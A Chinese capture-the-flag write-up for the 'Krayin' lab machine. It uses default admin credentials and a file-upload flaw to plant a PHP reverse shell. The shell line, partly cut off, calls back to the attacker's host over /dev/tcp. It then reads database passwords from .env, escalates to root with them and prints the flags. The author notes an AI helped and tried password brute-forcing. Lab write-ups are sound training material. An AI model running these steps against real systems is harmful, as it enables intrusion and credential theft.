本文最后更新于9 天前,其中的信息可能已经过时,如有错误请发送邮件到
matter_lmoon5731@outlook.com
社区[MazeSec | Home] 社区群321948805
靶机:Krayin
作者:群主
靶机ID: 728
系统:Linux
难度:Baby
基本信息
ip 192.168.56.15
信息收集
扫描端口
nmap 192.168.56.15 -p-

然后访问8080端口,发现是一个 Krayin框架的站点,然后目前又没有其他信息根据之前的题目可以猜测他的突破点应该就是在源码之间

然后找到其仓库,让ai去审一下发现两个漏洞点 其一 网站登录为默认密码
admin@example.com/admin123
其二 靶机的战点的版本为,不是最新版的版本并且这个版本存在文件上传漏洞
v2.2.3 存在 CVE-2026-38526 / EDB 52629 的认证后任意文件上传 → RCE;v2.2.4 起已修复
文件上传漏洞点分析
其在突破点为,邮件上传图片的校验只进行校验图片的后缀,利用抓包改php文件后缀上传进行反弹shell
打开邮箱上传图片的页面

然后进行抓包和改后缀写入php文件,然靶机开启监听
nc -lvnp 4444
& /dev/tcp/192.168.56.11/4444 0>&1"'); ?>

发送之后得到上传文件的路径并打开站点,shell成功
http://192.168.56.15:8080/storage/tinymce/6a8236d355d45ebd5a55434103f00d5b.php

然后在krayin/laravel下发现.env文件并发现密码
cat .env
得到
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=krayin
DB_USERNAME=krayin
DB_PASSWORD=root123
DB_PREFIX=


然后利用这个密码发现可以登录krayin和root
user
su krayin
cd krayin
cat user.txt
flag{user-5fd188d185e87bdc34fc0c1389d35409}
root
su root
cat root.txt
flag{root-ac0abf8a8a25305c77f1ff1130ee82ab}
反思
1.在今天上午的时候利用ai进行解题的时候其实以及到了shell的状态并且已经获取.env里面的密码,但是他验证的密码其实当时应该去验证一下的,反馈的不行之后就尝试去爆破密码了,但是连接状态一直短最后无法没有爆破出
2.在复现的时候发现自己的实力还是太弱了,复现路径得到之后为了找上传点/admin/tinymce/upload一直找不到。
3.其次就是目前来说思路基本是有了,实力后面在进一步提升










